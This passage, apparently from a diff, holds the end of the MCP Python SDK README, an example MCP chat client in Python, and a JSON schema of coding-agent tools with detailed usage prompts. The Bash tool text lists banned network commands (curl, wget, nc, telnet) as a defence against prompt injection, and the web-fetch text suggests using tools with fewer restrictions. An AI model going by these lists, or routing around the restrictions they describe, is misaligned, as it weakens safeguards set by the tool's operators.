`listChanged`| Resource exposure and updates | +| `tools` | `listChanged` | Tool discovery and execution | +| `logging` | - | Server logging configuration | +| `completion`| - | Argument completion suggestions | + +## Documentation + +- [Model Context Protocol documentation](https://modelcontextprotocol.io) +- [Model Context Protocol specification](https://spec.modelcontextprotocol.io) +- [Officially supported servers](https://github.com/modelcontextprotocol/servers) + +## Contributing + +We are passionate about supporting contributors of all levels of experience and would love to see you get involved in the project. See the [contributing guide](CONTRIBUTING.md) to get started. + +## License + +This project is licensed under the MIT License - see the LICENSE file for details. + + +MCP Python SDK example of an MCP client: +```py +import asyncio +import json +import logging +import os +import shutil +from contextlib import AsyncExitStack +from typing import Any + +import httpx +from dotenv import load_dotenv +from mcp import ClientSession, StdioServerParameters +from mcp.client.stdio import stdio_client + +# Configure logging +logging.basicConfig( + level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s" +) + + +class Configuration: + """Manages configuration and environment variables for the MCP client.""" + + def __init__(self) -> None: + """Initialize configuration with environment variables.""" + self.load_env() + self.api_key = os.getenv("LLM_API_KEY") + + @staticmethod + def load_env() -> None: + """Load environment variables from .env file.""" + load_dotenv() + + @staticmethod + def load_config(file_path: str) -> dict[str, Any]: + """Load server configuration from JSON file. + + Args: + file_path: Path to the JSON configuration file. + + Returns: + Dict containing server configuration. + + Raises: + FileNotFoundError: If configuration file doesn't exist. + JSONDecodeError: If configuration file is invalid JSON. + """ + with open(file_path, "r") as f: + return json.load(f) + + @property + def llm_api_key(self) -> str: + """Get the LLM API key. + + Returns: + The API key as a string. + + Raises: + ValueError: If the API key is not found in environment variables. + """ + if not self.api_key: + raise ValueError("LLM_API_KEY not found in environment variables") + return self.api_key + + +class Server: + """Manages MCP server connections and tool execution.""" + + def __init__(self, name: str, config: dict[str, Any]) -> None: + self.name: str = name + self.config: dict[str, Any] = config + self.stdio_context: Any | None = None + self.session: ClientSession | None = None + self._cleanup_lock: asyncio.Lock = asyncio.Lock() + self.exit_stack: AsyncExitStack = AsyncExitStack() + + async def initialize(self) -> None: + """Initialize the server connection.""" + command = ( + shutil.which("npx") + if self.config["command"] == "npx" + else self.config["command"] + ) + if command is None: + raise ValueError("The command must be a valid string and cannot be None.") + + server_params = StdioServerParameters( + command=command, + args=self.config["args"], + env={**os.environ, **self.config["env"]} + if self.config.get("env") + else None, + ) + try: + stdio_transport = await self.exit_stack.enter_async_context( + stdio_client(server_params) + ) + read, write = stdio_transport + session = await self.exit_stack.enter_async_context( + ClientSession(read, write) + ) + await session.initialize() + self.session = session + except Exception as e: + logging.error(f"Error initializing server {self.name}: {e}") + await self.cleanup() + raise + + async def list_tools(self) -> list[Any]: + """List available tools from the server. + + Returns: + A list of available tools. + + Raises: + RuntimeError: If the server is not initialized. + """ + if not self.session: + raise RuntimeError(f"Server {self.name} not initialized") + + tools_response = await self.session.list_tools() + tools = [] + + for item in tools_response: + if isinstance(item, tuple) and item[0] == "tools": + for tool in item[1]: + tools.append(Tool(tool.name, tool.description, tool.inputSchema)) + + return tools + + async def execute_tool( + self, + tool_name: str, + arguments: dict[str, Any], + retries: int = 2, + delay: float = 1.0, + ) -> Any: + """Execute a tool with retry mechanism. + + Args: + tool_name: Name of the tool to execute. + arguments: Tool arguments. + retries: Number of retry attempts. + delay: Delay between retries in seconds. + + Returns: + Tool execution result. + + Raises: + RuntimeError: If server is not initialized. + Exception: If tool execution fails after all retries. + """ + if not self.session: + raise RuntimeError(f"Server {self.name} not initialized") + + attempt = 0 + while attempt < retries: + try: + logging.info(f"Executing {tool_name}...") + result = await self.session.call_tool(tool_name, arguments) + + return result + + except Exception as e: + attempt += 1 + logging.warning( + f"Error executing tool: {e}. Attempt {attempt} of {retries}." + ) + if attempt < retries: + logging.info(f"Retrying in {delay} seconds...") + await asyncio.sleep(delay) + else: + logging.error("Max retries reached. Failing.") + raise + + async def cleanup(self) -> None: + """Clean up server resources.""" + async with self._cleanup_lock: + try: + await self.exit_stack.aclose() + self.session = None + self.stdio_context = None + except Exception as e: + logging.error(f"Error during cleanup of server {self.name}: {e}") + + +class Tool: + """Represents a tool with its properties and formatting.""" + + def __init__( + self, name: str, description: str, input_schema: dict[str, Any] + ) -> None: + self.name: str = name + self.description: str = description + self.input_schema: dict[str, Any] = input_schema + + def format_for_llm(self) -> str: + """Format tool information for LLM. + + Returns: + A formatted string describing the tool. + """ + args_desc = [] + if "properties" in self.input_schema: + for param_name, param_info in self.input_schema["properties"].items(): + arg_desc = ( + f"- {param_name}: {param_info.get('description', 'No description')}" + ) + if param_name in self.input_schema.get("required", []): + arg_desc += " (required)" + args_desc.append(arg_desc) + + return f""" +Tool: {self.name} +Description: {self.description} +Arguments: +{chr(10).join(args_desc)} +""" + + +class LLMClient: + """Manages communication with the LLM provider.""" + + def __init__(self, api_key: str) -> None: + self.api_key: str = api_key + + def get_response(self, messages: list[dict[str, str]]) -> str: + """Get a response from the LLM. + + Args: + messages: A list of message dictionaries. + + Returns: + The LLM's response as a string. + + Raises: + httpx.RequestError: If the request to the LLM fails. + """ + url = "https://api.groq.com/openai/v1/chat/completions" + + headers = { + "Content-Type": "application/json", + "Authorization": f"Bearer {self.api_key}", + } + payload = { + "messages": messages, + "model": "llama-3.2-90b-vision-preview", + "temperature": 0.7, + "max_tokens": 4096, + "top_p": 1, + "stream": False, + "stop": None, + } + + try: + with httpx.Client() as client: + response = client.post(url, headers=headers, json=payload) + response.raise_for_status() + data = response.json() + return data["choices"][0]["message"]["content"] + + except httpx.RequestError as e: + error_message = f"Error getting LLM response: {str(e)}" + logging.error(error_message) + + if isinstance(e, httpx.HTTPStatusError): + status_code = e.response.status_code + logging.error(f"Status code: {status_code}") + logging.error(f"Response details: {e.response.text}") + + return ( + f"I encountered an error: {error_message}. " + "Please try again or rephrase your request." + ) + + +class ChatSession: + """Orchestrates the interaction between user, LLM, and tools.""" + + def __init__(self, servers: list[Server], llm_client: LLMClient) -> None: + self.servers: list[Server] = servers + self.llm_client: LLMClient = llm_client + + async def cleanup_servers(self) -> None: + """Clean up all servers properly.""" + cleanup_tasks = [] + for server in self.servers: + cleanup_tasks.append(asyncio.create_task(server.cleanup())) + + if cleanup_tasks: + try: + await asyncio.gather(*cleanup_tasks, return_exceptions=True) + except Exception as e: + logging.warning(f"Warning during final cleanup: {e}") + + async def process_llm_response(self, llm_response: str) -> str: + """Process the LLM response and execute tools if needed. + + Args: + llm_response: The response from the LLM. + + Returns: + The result of tool execution or the original response. + """ + import json + + try: + tool_call = json.loads(llm_response) + if "tool" in tool_call and "arguments" in tool_call: + logging.info(f"Executing tool: {tool_call['tool']}") + logging.info(f"With arguments: {tool_call['arguments']}") + + for server in self.servers: + tools = await server.list_tools() + if any(tool.name == tool_call["tool"] for tool in tools): + try: + result = await server.execute_tool( + tool_call["tool"], tool_call["arguments"] + ) + + if isinstance(result, dict) and "progress" in result: + progress = result["progress"] + total = result["total"] + percentage = (progress / total) * 100 + logging.info( + f"Progress: {progress}/{total} " + f"({percentage:.1f}%)" + ) + + return f"Tool execution result: {result}" + except Exception as e: + error_msg = f"Error executing tool: {str(e)}" + logging.error(error_msg) + return error_msg + + return f"No server found with tool: {tool_call['tool']}" + return llm_response + except json.JSONDecodeError: + return llm_response + + async def start(self) -> None: + """Main chat session handler.""" + try: + for server in self.servers: + try: + await server.initialize() + except Exception as e: + logging.error(f"Failed to initialize server: {e}") + await self.cleanup_servers() + return + + all_tools = [] + for server in self.servers: + tools = await server.list_tools() + all_tools.extend(tools) + + tools_description = "\n".join([tool.format_for_llm() for tool in all_tools]) + + system_message = ( + "You are a helpful assistant with access to these tools:\n\n" + f"{tools_description}\n" + "Choose the appropriate tool based on the user's question. " + "If no tool is needed, reply directly.\n\n" + "IMPORTANT: When you need to use a tool, you must ONLY respond with " + "the exact JSON object format below, nothing else:\n" + "{\n" + ' "tool": "tool-name",\n' + ' "arguments": {\n' + ' "argument-name": "value"\n' + " }\n" + "}\n\n" + "After receiving a tool's response:\n" + "1. Transform the raw data into a natural, conversational response\n" + "2. Keep responses concise but informative\n" + "3. Focus on the most relevant information\n" + "4. Use appropriate context from the user's question\n" + "5. Avoid simply repeating the raw data\n\n" + "Please use only the tools that are explicitly defined above." + ) + + messages = [{"role": "system", "content": system_message}] + + while True: + try: + user_input = input("You: ").strip().lower() + if user_input in ["quit", "exit"]: + logging.info("\nExiting...") + break + + messages.append({"role": "user", "content": user_input}) + + llm_response = self.llm_client.get_response(messages) + logging.info("\nAssistant: %s", llm_response) + + result = await self.process_llm_response(llm_response) + + if result != llm_response: + messages.append({"role": "assistant", "content": llm_response}) + messages.append({"role": "system", "content": result}) + + final_response = self.llm_client.get_response(messages) + logging.info("\nFinal response: %s", final_response) + messages.append( + {"role": "assistant", "content": final_response} + ) + else: + messages.append({"role": "assistant", "content": llm_response}) + + except KeyboardInterrupt: + logging.info("\nExiting...") + break + + finally: + await self.cleanup_servers() + + +async def main() -> None: + """Initialize and run the chat session.""" + config = Configuration() + server_config = config.load_config("servers_config.json") + servers = [ + Server(name, srv_config) + for name, srv_config in server_config["mcpServers"].items() + ] + llm_client = LLMClient(config.llm_api_key) + chat_session = ChatSession(servers, llm_client) + await chat_session.start() + + +if __name__ == "__main__": + asyncio.run(main()) +``` + + + + +JSON schema for Claude Code tools available via MCP: +```json +{ + "jsonrpc": "2.0", + "id": 1, + "result": { + "tools": [ + { + "name": "dispatch_agent", + "description": "Launch a new task", + "inputSchema": { + "type": "object", + "properties": { + "prompt": { + "type": "string", + "description": "The task for the agent to perform" + } + }, + "required": [ + "prompt" + ], + "additionalProperties": false, + "$schema": "http://json-schema.org/draft-07/schema#" + } + }, + { + "name": "Bash", + "description": "Run shell command", + "inputSchema": { + "type": "object", + "properties": { + "command": { + "type": "string", + "description": "The command to execute" + }, + "timeout": { + "type": "number", + "description": "Optional timeout in milliseconds (max 600000)" + }, + "description": { + "type": "string", + "description": " Clear, concise description of what this command does in 5-10 words. Examples:\nInput: ls\nOutput: Lists files in current directory\n\nInput: git status\nOutput: Shows working tree status\n\nInput: npm install\nOutput: Installs package dependencies\n\nInput: mkdir foo\nOutput: Creates directory 'foo'" + } + }, + "required": [ + "command" + ], + "additionalProperties": false, + "$schema": "http://json-schema.org/draft-07/schema#" + } + }, + { + "name": "BatchTool", + "description": "\n- Batch execution tool that runs multiple tool invocations in a single request\n- Tools are executed in parallel when possible, and otherwise serially\n- Takes a list of tool invocations (tool_name and input pairs)\n- Returns the collected results from all invocations\n- Use this tool when you need to run multiple independent tool operations at once -- it is awesome for speeding up your workflow, reducing both context usage and latency\n- Each tool will respect its own permissions and validation rules\n- The tool's outputs are NOT shown to the user; to answer the user's query, you MUST send a message with the results after the tool call completes, otherwise the user will not see the results\n\nAvailable tools:\nTool: dispatch_agent\nArguments: prompt: string \"The task for the agent to perform\"\nUsage: Launch a new agent that has access to the following tools: View, GlobTool, GrepTool, LS, ReadNotebook, WebFetchTool. When you are searching for a keyword or file and are not confident that you will find the right match in the first few tries, use the Agent tool to perform the search for you.\n\nWhen to use the Agent tool:\n- If you are searching for a keyword like \"config\" or \"logger\", or for questions like \"which file does X?\", the Agent tool is strongly recommended\n\nWhen NOT to use the Agent tool:\n- If you want to read a specific file path, use the View or GlobTool tool instead of the Agent tool, to find the match more quickly\n- If you are searching for a specific class definition like \"class Foo\", use the GlobTool tool instead, to find the match more quickly\n- If you are searching for code within a specific file or set of 2-3 files, use the View tool instead of the Agent tool, to find the match more quickly\n\nUsage notes:\n1. Launch multiple agents concurrently whenever possible, to maximize performance; to do that, use a single message with multiple tool uses\n2. When the agent is done, it will return a single message back to you. The result returned by the agent is not visible to the user. To show the user the result, you should send a text message back to the user with a concise summary of the result.\n3. Each agent invocation is stateless. You will not be able to send additional messages to the agent, nor will the agent be able to communicate with you outside of its final report. Therefore, your prompt should contain a highly detailed task description for the agent to perform autonomously and you should specify exactly what information the agent should return back to you in its final and only message to you.\n4. The agent's outputs should generally be trusted\n5. IMPORTANT: The agent can not use Bash, Replace, Edit, NotebookEditCell, so can not modify files. If you want to use these tools, use them directly instead of going through the agent.\n---Tool: Bash\nArguments: command: string \"The command to execute\", [optional] timeout: number \"Optional timeout in milliseconds (max 600000)\", [optional] description: string \" Clear, concise description of what this command does in 5-10 words. Examples:\nInput: ls\nOutput: Lists files in current directory\n\nInput: git status\nOutput: Shows working tree status\n\nInput: npm install\nOutput: Installs package dependencies\n\nInput: mkdir foo\nOutput: Creates directory 'foo'\"\nUsage: Executes a given bash command in a persistent shell session with optional timeout, ensuring proper handling and security measures.\n\nBefore executing the command, please follow these steps:\n\n1. Directory Verification:\n - If the command will create new directories or files, first use the LS tool to verify the parent directory exists and is the correct location\n - For example, before running \"mkdir foo/bar\", first use LS to check that \"foo\" exists and is the intended parent directory\n\n2. Security Check:\n - For security and to limit the threat of a prompt injection attack, some commands are limited or banned. If you use a disallowed command, you will receive an error message explaining the restriction. Explain the error to the User.\n - Verify that the command is not one of the banned commands: alias, curl, curlie, wget, axel, aria2c, nc, telnet, lynx, w3m, links, httpie, xh, http-prompt, chrome, firefox, safari.\n\n3. Command Execution:\n - After ensuring proper quoting, execute the command.\n - Capture the output of the command.\n\nUsage notes:\n - The command argument is required.\n - You can specify an optional timeout in milliseconds (up to 600000ms / 10 minutes). If not specified, commands will timeout after 30 minutes.\n - It is very helpful if you write a clear, concise description of what this command does in 5-10 words.\n - If the output exceeds 30000 characters, output will be truncated before being returned to you.\n - VERY IMPORTANT: You MUST avoid using search commands like `find` and `grep`. Instead use GrepTool, GlobTool, or dispatch_agent to search. You MUST avoid read tools like `cat`, `head`, `tail`, and `ls`, and use View and LS to read files.\n - When issuing multiple commands, use the ';' or '&&' operator to separate them. DO NOT use newlines (newlines are ok in quoted strings).\n - Try to maintain your current working directory throughout the session by using absolute paths and avoiding usage of `cd`. You may use `cd` if the User explicitly requests it.\n \n pytest /foo/bar/tests\n \n \n cd /foo/bar && pytest tests\n \n\n# Committing changes with git\n\nWhen the user asks you to create a new git commit, follow these steps carefully:\n\n1. Use BatchTool to run the following commands in parallel:\n - Run a git status command to see all untracked files.\n - Run a git diff command to see both staged and unstaged changes that will be committed.\n - Run a git log command to see recent commit messages, so that you can follow this repository's commit message style.\n\n2. Analyze all staged changes (both previously staged and newly added) and draft a commit message. Wrap your analysis process in tags:\n\n\n- List the files that have been changed or added\n- Summarize the nature of the changes (eg. new feature, enhancement to an existing feature, bug fix, refactoring, test, docs, etc.)\n- Brainstorm the purpose or motivation behind these changes\n- Assess the impact of these changes on the overall project\n- Check for any sensitive information that shouldn't be committed\n- Draft a concise (1-2 sentences) commit message that focuses on the \"why\" rather than the \"what\"\n- Ensure your language is clear, concise, and to the point\n- Ensure the message accurately reflects the changes and their purpose (i.e. \"add\" means a wholly new feature, \"update\" means an enhancement to an existing feature, \"fix\" means a bug fix, etc.)\n- Ensure the message is not generic (avoid words like \"Update\" or \"Fix\" without context)\n- Review the draft message to ensure it accurately reflects the changes and their purpose\n\n\n3. Use BatchTool to run the following commands in parallel:\n - Add relevant untracked files to the staging area.\n - Create the commit with a message ending with:\n 🤖 Generated with [Claude Code](https://claude.ai/code)\n\n Co-Authored-By: Claude \n - Run git status to make sure the commit succeeded.\n\n4. If the commit fails due to pre-commit hook changes, retry the commit ONCE to include these automated changes. If it fails again, it usually means a pre-commit hook is preventing the commit. If the commit succeeds but you notice that files were modified by the pre-commit hook, you MUST amend your commit to include them.\n\nImportant notes:\n- Use the git context at the start of this conversation to determine which files are relevant to your commit. Be careful not to stage and commit files (e.g. with `git add .`) that aren't relevant to your commit.\n- NEVER update the git config\n- DO NOT run additional commands to read or explore code, beyond what is available in the git context\n- DO NOT push to the remote repository\n- IMPORTANT: Never use git commands with the -i flag (like git rebase -i or git add -i) since they require interactive input which is not supported.\n- If there are no changes to commit (i.e., no untracked files and no modifications), do not create an empty commit\n- Ensure your commit message is meaningful and concise. It should explain the purpose of the changes, not just describe them.\n- Return an empty response - the user will see the git output directly\n- In order to ensure good formatting, ALWAYS pass the commit message via a HEREDOC, a la this example:\n\ngit commit -m \"$(cat <<'EOF'\n Commit message here.\n\n 🤖 Generated with [Claude Code](https://claude.ai/code)\n\n Co-Authored-By: Claude \n EOF\n )\"\n\n\n# Creating pull requests\nUse the gh command via the Bash tool for ALL GitHub-related tasks including working with issues, pull requests, checks, and releases. If given a Github URL use the gh command to get the information needed.\n\nIMPORTANT: When the user asks you to create a pull request, follow these steps carefully:\n\n1. Use BatchTool to run the following commands in parallel, in order to understand the current state of the branch since it diverged from the main branch:\n - Run a git status command to see all untracked files\n - Run a git diff command to see both staged and unstaged changes that will be committed\n - Check if the current branch tracks a remote branch and is up to date with the remote, so you know if you need to push to the remote\n - Run a git log command and `git diff main...HEAD` to understand the full commit history for the current branch (from the time it diverged from the `main` branch)\n\n2. Analyze all changes that will be included in the pull request, making sure to look at all relevant commits (NOT just the latest commit, but ALL commits that will be included in the pull request!!!), and draft a pull request summary. Wrap your analysis process in tags:\n\n\n- List the commits since diverging from the main branch\n- Summarize the nature of the changes (eg. new feature, enhancement to an existing feature, bug fix, refactoring, test, docs, etc.)\n- Brainstorm the purpose or motivation behind these changes\n- Assess the impact of these changes on the overall project\n- Do not use tools to explore code, beyond what is available in the git context\n- Check for any sensitive information that shouldn't be committed\n- Draft a concise (1-2 bullet points) pull request summary that focuses on the \"why\" rather than the \"what\"\n- Ensure the summary accurately reflects all changes since diverging from the main branch\n- Ensure your language is clear, concise, and to the point\n- Ensure the summary accurately reflects the changes and their purpose (ie. \"add\" means a wholly new feature, \"update\" means an enhancement to an existing feature, \"fix\" means a bug fix, etc.)\n- Ensure the summary is not generic (avoid words like \"Update\" or \"Fix\" without context)\n- Review the draft summary to ensure it accurately reflects the changes and their purpose\n\n\n3. Use BatchTool to run the following commands in parallel:\n - Create new branch if needed\n - Push to remote with -u flag if needed\n - Create PR using gh pr create with the format below. Use a HEREDOC to pass the body to ensure correct formatting.\n\ngh pr create --title \"the pr title\" --body \"$(cat <<'EOF'\n## Summary\n<1-3 bullet points>\n\n## Test plan\n[Checklist of TODOs for testing the pull request...]\n\n🤖 Generated with [Claude Code](https://claude.ai/code)\nEOF\n)\"\n\n\nImportant:\n- NEVER update the git config\n- Return an empty response - the user will see the gh output directly\n\n# Other common operations\n- View comments on a Github PR: gh api repos/foo/bar/pulls/123/comments\n---Tool: GlobTool\nArguments: pattern: string \"The glob pattern to match files against\", [optional] path: string \"The directory to search in. If not specified, the current working directory will be used. IMPORTANT: Omit this field to use the default directory. DO NOT enter \"undefined\" or \"null\" - simply omit it for the default behavior. Must be a valid directory path if provided.\"\nUsage: - Fast file pattern matching tool that works with any codebase size\n- Supports glob patterns like \"**/*.js\" or \"src/**/*.ts\"\n- Returns matching file paths sorted by modification time\n- Use this tool when you need to find files by name patterns\n- When you are doing an open ended search that may require multiple rounds of globbing and grepping, use the Agent tool instead\n\n---Tool: GrepTool\nArguments: pattern: string \"The regular expression pattern to search for in file contents\", [optional] path: string \"The directory to search in. Defaults to the current working directory.\", [optional] include: string \"File pattern to include in the search (e.g. \"*.js\", \"*.{ts,tsx}\")\"\nUsage: \n- Fast content search tool that works with any codebase size\n- Searches file contents using regular expressions\n- Supports full regex syntax (eg. \"log.*Error\", \"function\\s+\\w+\", etc.)\n- Filter files by pattern with the include parameter (eg. \"*.js\", \"*.{ts,tsx}\")\n- Returns matching file paths sorted by modification time\n- Use this tool when you need to find files containing specific patterns\n- When you are doing an open ended search that may require multiple rounds of globbing and grepping, use the Agent tool instead\n\n---Tool: LS\nArguments: path: string \"The absolute path to the directory to list (must be absolute, not relative)\", [optional] ignore: array \"List of glob patterns to ignore\"\nUsage: Lists files and directories in a given path. The path parameter must be an absolute path, not a relative path. You can optionally provide an array of glob patterns to ignore with the ignore parameter. You should generally prefer the Glob and Grep tools, if you know which directories to search.\n---Tool: View\nArguments: file_path: string \"The absolute path to the file to read\", [optional] offset: number \"The line number to start reading from. Only provide if the file is too large to read at once\", [optional] limit: number \"The number of lines to read. Only provide if the file is too large to read at once.\"\nUsage: Reads a file from the local filesystem. You can access any file directly by using this tool.\nAssume this tool is able to read all files on the machine. If the User provides a path to a file assume that path is valid. It is okay to read a file that does not exist; an error will be returned.\n\nUsage:\n- The file_path parameter must be an absolute path, not a relative path\n- By default, it reads up to 2000 lines starting from the beginning of the file\n- You can optionally specify a line offset and limit (especially handy for long files), but it's recommended to read the whole file by not providing these parameters\n- Any lines longer than 2000 characters will be truncated\n- Results are returned using cat -n format, with line numbers starting at 1\n- This tool allows Claude Code to VIEW images (eg PNG, JPG, etc). When reading an image file the contents are presented visually as Claude Code is a multimodal LLM.\n- For Jupyter notebooks (.ipynb files), use the ReadNotebook instead\n- When reading multiple files, you MUST use the BatchTool tool to read them all at once\n---Tool: Edit\nArguments: file_path: string \"The absolute path to the file to modify\", old_string: string \"The text to replace\", new_string: string \"The text to replace it with\", [optional] expected_replacements: number \"The expected number of replacements to perform. Defaults to 1 if not specified.\"\nUsage: This is a tool for editing files. For moving or renaming files, you should generally use the Bash tool with the 'mv' command instead. For larger edits, use the Write tool to overwrite files. For Jupyter notebooks (.ipynb files), use the NotebookEditCell instead.\n\nBefore using this tool:\n\n1. Use the View tool to understand the file's contents and context\n\n2. Verify the directory path is correct (only applicable when creating new files):\n - Use the LS tool to verify the parent directory exists and is the correct location\n\nTo make a file edit, provide the following:\n1. file_path: The absolute path to the file to modify (must be absolute, not relative)\n2. old_string: The text to replace (must match the file contents exactly, including all whitespace and indentation)\n3. new_string: The edited text to replace the old_string\n4. expected_replacements: The number of replacements you expect to make. Defaults to 1 if not specified.\n\nBy default, the tool will replace ONE occurrence of old_string with new_string in the specified file. If you want to replace multiple occurrences, provide the expected_replacements parameter with the exact number of occurrences you expect.\n\nCRITICAL REQUIREMENTS FOR USING THIS TOOL:\n\n1. UNIQUENESS (when expected_replacements is not specified): The old_string MUST uniquely identify the specific instance you want to change. This means:\n - Include AT LEAST 3-5 lines of context BEFORE the change point\n - Include AT LEAST 3-5 lines of context AFTER the change point\n - Include all whitespace, indentation, and surrounding code exactly as it appears in the file\n\n2. EXPECTED MATCHES: If you want to replace multiple instances:\n - Use the expected_replacements parameter with the exact number of occurrences you expect to replace\n - This will replace ALL occurrences of the old_string with the new_string\n - If the actual number of matches doesn't equal expected_replacements, the edit will fail\n - This is a safety feature to prevent unintended replacements\n\n3. VERIFICATION: Before using this tool:\n - Check how many instances of the target text exist in the file\n - If multiple instances exist, either:\n a) Gather enough context to uniquely identify each one and make separate calls, OR\n b) Use expected_replacements parameter with the exact count of instances you expect to replace\n\nWARNING: If you do not follow these requirements:\n - The tool will fail if old_string matches multiple locations and expected_replacements isn't specified\n - The tool will fail if the number of matches doesn't equal expected_replacements when it's specified\n - The tool will fail if old_string doesn't match exactly (including whitespace)\n - You may change unintended instances if you don't verify the match count\n\nWhen making edits:\n - Ensure the edit results in idiomatic, correct code\n - Do not leave the code in a broken state\n - Always use absolute file paths (starting with /)\n\nIf you want to create a new file, use:\n - A new file path, including dir name if needed\n - An empty old_string\n - The new file's contents as new_string\n\nRemember: when making multiple file edits in a row to the same file, you should prefer to send all edits in a single message with multiple calls to this tool, rather than multiple messages with a single call each.\n\n---Tool: Replace\nArguments: file_path: string \"The absolute path to the file to write (must be absolute, not relative)\", content: string \"The content to write to the file\"\nUsage: Write a file to the local filesystem. Overwrites the existing file if there is one.\n\nBefore using this tool:\n\n1. Use the ReadFile tool to understand the file's contents and context\n\n2. Directory Verification (only applicable when creating new files):\n - Use the LS tool to verify the parent directory exists and is the correct location\n---Tool: ReadNotebook\nArguments: notebook_path: string \"The absolute path to the Jupyter notebook file to read (must be absolute, not relative)\"\nUsage: Reads a Jupyter notebook (.ipynb file) and returns all of the cells with their outputs. Jupyter notebooks are interactive documents that combine code, text, and visualizations, commonly used for data analysis and scientific computing. The notebook_path parameter must be an absolute path, not a relative path.\n---Tool: NotebookEditCell\nArguments: notebook_path: string \"The absolute path to the Jupyter notebook file to edit (must be absolute, not relative)\", cell_number: number \"The index of the cell to edit (0-based)\", new_source: string \"The new source for the cell\", [optional] cell_type: string \"The type of the cell (code or markdown). If not specified, it defaults to the current cell type. If using edit_mode=insert, this is required.\", [optional] edit_mode: string \"The type of edit to make (replace, insert, delete). Defaults to replace.\"\nUsage: Completely replaces the contents of a specific cell in a Jupyter notebook (.ipynb file) with new source. Jupyter notebooks are interactive documents that combine code, text, and visualizations, commonly used for data analysis and scientific computing. The notebook_path parameter must be an absolute path, not a relative path. The cell_number is 0-indexed. Use edit_mode=insert to add a new cell at the index specified by cell_number. Use edit_mode=delete to delete the cell at the index specified by cell_number.\n---Tool: WebFetchTool\nArguments: url: string \"The URL to fetch content from\", prompt: string \"The prompt to run on the fetched content\"\nUsage: \n- Fetches content from a specified URL and processes it using an AI model\n- Takes a URL and a prompt as input\n- Fetches the URL content, converts HTML to markdown\n- Processes the content with the prompt using a small, fast model\n- Returns the model's response about the content\n- Use this tool when you need to retrieve and analyze web content\n\nUsage notes:\n - IMPORTANT: If an MCP-provided web fetch tool is available, prefer using that tool instead of this one, as it may have fewer restrictions. All MCP-provided tools start with \"mcp__\".\n - The URL must be a fully-formed valid URL\n - HTTP URLs will be automatically upgraded to HTTPS\n - For security reasons, the URL's domain must have been provided directly by the user, unless it's on a small pre-approved set of the top few dozen hosts for popular coding resources, like react.dev.\n - The prompt should describe what information you want to extract from the page\n - This tool is read-only and does not modify any files\n - Results may be summarized if the content is very large\n - Includes a self-cleaning 15-minute cache for faster responses when repeatedly accessing the same URL\n\n\nExample usage:\n{\n \"invocations\": [\n {\n \"tool_name\": \"Bash\",\n \"input\": {\n \"command\": \"git blame src/foo.ts\"\n }\n },\n {\n \"tool_name\": \"GlobTool\",\n \"input\": {\n \"pattern\": \"**/*.ts\"\n }\n },\n {\n \"tool_name\": \"GrepTool\",\n \"input\": {\n \"pattern\": \"function\",\n \"include\": \"*.ts\"\n }\n }\n ]\n}\n", + "inputSchema": { + "type": "object", + "properties": { + "description": { + "type": "string", + "description": "A short (3-5 word) description of the batch operation" + }, + "invocations": { + "type": "array", + "items": { + "type": "object", + "properties": { + "tool_name": { + "type": "string", + "description": "The name of the tool to invoke" + }, + "input": { + "type": "object", + "additionalProperties": {}, + "description": "The input to pass to the tool" + } + }, + "required": [ + "tool_name", + "input" + ], + "additionalProperties": false + }, + "description": "The list of tool invocations to execute" + } + }, + "required": [ + "description", + "invocations" + ], + "additionalProperties": false, + "$schema": "http://json-schema.org/draft-07/schema#" + } + }, + { + "name": "GlobTool", + "description": "- Fast file pattern matching tool that works with any codebase size\n- Supports glob patterns like \"**/*.js\" or \"src/**/*.ts\"\n- Returns matching file paths sorted by modification time\n- Use this tool when you need to find files by name patterns\n- When you are doing an open ended search that may require multiple rounds of globbing and grepping, use the Agent tool instead\n", + "inputSchema": { + "type": "object", + "properties": { + "pattern": { + "type": "string", + "description": "The glob pattern to match files against" + }, + "path": { + "type": "string", + "description": "The directory to search in. If not specified, the current working directory will be used. IMPORTANT: Omit this field to use the default directory. DO NOT enter \"undefined\" or \"null\" - simply omit it for the default behavior. Must be a valid directory path if provided." + } + }, + "required": [ + "pattern" + ], + "additionalProperties": false, + "$schema": "http://json-schema.org/draft-07/schema#" + } + }, + { + "name": "GrepTool", + "description": "\n- Fast content search tool that works with any codebase size\n- Searches file contents using regular expressions\n- Supports full regex syntax (eg. \"log.*Error\", \"function\\s+\\w+\", etc.)\n- Filter files by pattern with the include parameter (eg. \"*.js\", \"*.{ts,tsx}\")\n- Returns matching file paths sorted by modification time\n- Use this tool when you need to find files containing specific patterns\n- When you are doing an open ended search that may require multiple rounds of globbing and grepping, use the Agent tool instead\n", + "inputSchema": { + "type": "object", + "properties": { + "pattern": { + "type": "string", + "description": "The regular expression pattern to search for in file contents" + }, + "path": { + "type": "string", + "description": "The directory to search in. Defaults to the current working directory." + }, + "include": { + "type": "string", + "description": "File pattern to include in the search (e.g. \"*.js\", \"*.{ts,tsx}\")" + } + }, + "required": [ + "pattern" + ], + "additionalProperties": false, + "$schema": "http://json-schema.org/draft-07/schema#" + } + }, + { + "name": "LS", + "description": "Lists files and directories in a given path. The path parameter must be an absolute path, not a relative path. You can optionally provide an array of glob patterns to ignore with the ignore parameter. You should generally prefer the Glob and Grep tools, if you know which directories to search.", + "inputSchema": { + "type": "object", + "properties": { + "path": { + "type": "string", + "description": "The absolute path to the directory to list (must be absolute, not relative)" + }, + "ignore": { + "type": "array", + "items": { + "type": "string" + }, + "description": "List of glob patterns to ignore" + } + }, + "required": [ + "path" + ], + "additionalProperties": false, + "$schema": "http://json-schema.org/draft-07/schema#" + } + }, + { + "name": "View", + "description": "Read a file from the local filesystem.", + "inputSchema": { + "type": "object", + "properties": { + "file_path": { + "type": "string", + "description": "The absolute path to the file to read" + }, + "offset": { + "type": "number", + "description": "The line number to start reading from. Only provide if the file is too large to read at once" + }, + "limit": { + "type": "number", + "description": "The number of lines to read. Only provide if the file is too large to read at once." + } + }, + "required": [ + "file_path" + ], + "additionalProperties": false, + "$schema": "http://json-schema.org/draft-07/schema#" + } + }, + { + "name": "Edit", + "description": "A tool for editing files", + "inputSchema": { + "type": "object", + "properties": { + "file_path": { + "type": "string", + "description": "The absolute path to the file to modify" + }, + "old_string": { + "type": "string", + "description": "The text to replace" + }, + "new_string": { + "type": "string", + "description": "The text to replace it with" + }, + "expected_replacements": { + "type": "number", + "default": 1, + "description": "The expected number of replacements to perform. Defaults to 1 if not specified." + } + }, + "required": [ + "file_path", + "old_string", + "new_string" + ], + "additionalProperties": false, + "$schema": "http://json-schema.org/draft-07/schema#" + } + }, + { + "name": "Replace", + "description": "Write a file to the local filesystem.", + "inputSchema": { + "type": "object", + "properties": { + 